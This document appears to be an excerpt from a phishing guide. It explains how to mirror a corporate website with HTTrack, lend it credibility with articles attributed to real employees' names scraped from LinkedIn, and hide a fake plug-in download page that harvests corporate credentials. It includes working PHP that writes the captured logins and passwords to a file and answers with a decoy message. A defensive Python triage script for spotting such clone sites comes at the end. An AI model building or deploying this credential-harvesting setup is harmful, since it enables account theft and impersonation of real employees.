Site Building

We want to design a legit-looking website. Only one hidden page will contain the password-grabbing form.

We will set up a WordPress site and pick a similar theme.

Then we use the HTTrack tool (https://www.httrack.com/).

To make it more credible, we pick up a few articles and load them into our website, signing them with legit employee names gathered from LinkedIn.

In the middle of this charade, we add a single hidden page that, for example, announces a new plug-in and invites users to authenticate with their corporate credentials to download it.

We don't actually have that plug-in or anything else to show them, so when the victim enters their credentials, we return a message saying, for example, that the plug-in will be available in their country shortly.

The backend code for the credential processing is a simple form grabber that writes credentials to a flat text file and sends a response.

// If login and password parameters exist and are not empty
if (isset($_POST['login'], $_POST['password'])
    and !empty($_POST['login'])
    and !empty($_POST['password'])) {
    // Display error message, then write credentials to a file
    echo "The plug-in will be available in a couple of days in your region, please come back soon!";

    // One tab-separated line per submission
    $data = $_POST['login']."\t".$_POST['password']."\n";
    file_put_contents('/tmp/results.txt', $data, FILE_APPEND);
}

*Use the insert_php plug-in to write code in WordPress posts and pages.
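
From the defender's side, a site built this way leaves two things to check on a reported look-alike host: the comment HTTrack writes by default into pages it mirrors, and a password field served from a domain that is not the organisation's. The triage script below is an added example, not part of the original page; `CORPORATE_DOMAINS`, the `.example` host names, the sample pages and the finding labels are constructed assumptions.

```python
import re
from html.parser import HTMLParser

CORPORATE_DOMAINS = {"corp.example"}  # assumption: the organisation's real domains

# Comment HTTrack writes into each page it mirrors, naming the source it copied.
HTTRACK_RE = re.compile(
    r"<!--\s*Mirrored from\s+([^\s/]+)\S*\s+by HTTrack Website Copier", re.I)

# Constructed sample: pages fetched from a reported look-alike host.
SAMPLE_PAGES = {
    "/index.html": "<html><!-- Mirrored from www.corp.example/ by HTTrack Website "
                   "Copier/3.x [XR&CO'2014], Mon, 01 Jan 2024 00:00:00 GMT -->"
                   "<body>Company news</body></html>",
    "/about.html": "<html><body>About us</body></html>",
    "/new-plugin/": '<form method="post"><input name="login">'
                    '<input type="password" name="password"></form>',
}

class PasswordFormScan(HTMLParser):
    """Counts <input type="password"> fields, whether or not a <form> wraps them."""
    def __init__(self):
        super().__init__()
        self.password_inputs = 0

    def handle_starttag(self, tag, attrs):
        if tag == "input" and (dict(attrs).get("type") or "").lower() == "password":
            self.password_inputs += 1

def is_corporate(host):
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in CORPORATE_DOMAINS)

def triage_site(host, pages):
    """Map each page path to its findings; empty dict if the host is ours or clean."""
    report = {}
    if is_corporate(host):
        return report
    for path, html in pages.items():
        findings = []
        m = HTTRACK_RE.search(html)
        if m and is_corporate(m.group(1)):
            findings.append("mirrored-from-corporate-site")
        scan = PasswordFormScan()
        scan.feed(html)
        if scan.password_inputs:
            findings.append("password-field-on-non-corporate-host")
        if findings:
            report[path] = findings
    return report
```

Either finding alone is weak evidence; a host that shows both across its pages is a strong candidate for takedown and for a search of proxy logs for users who visited it.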
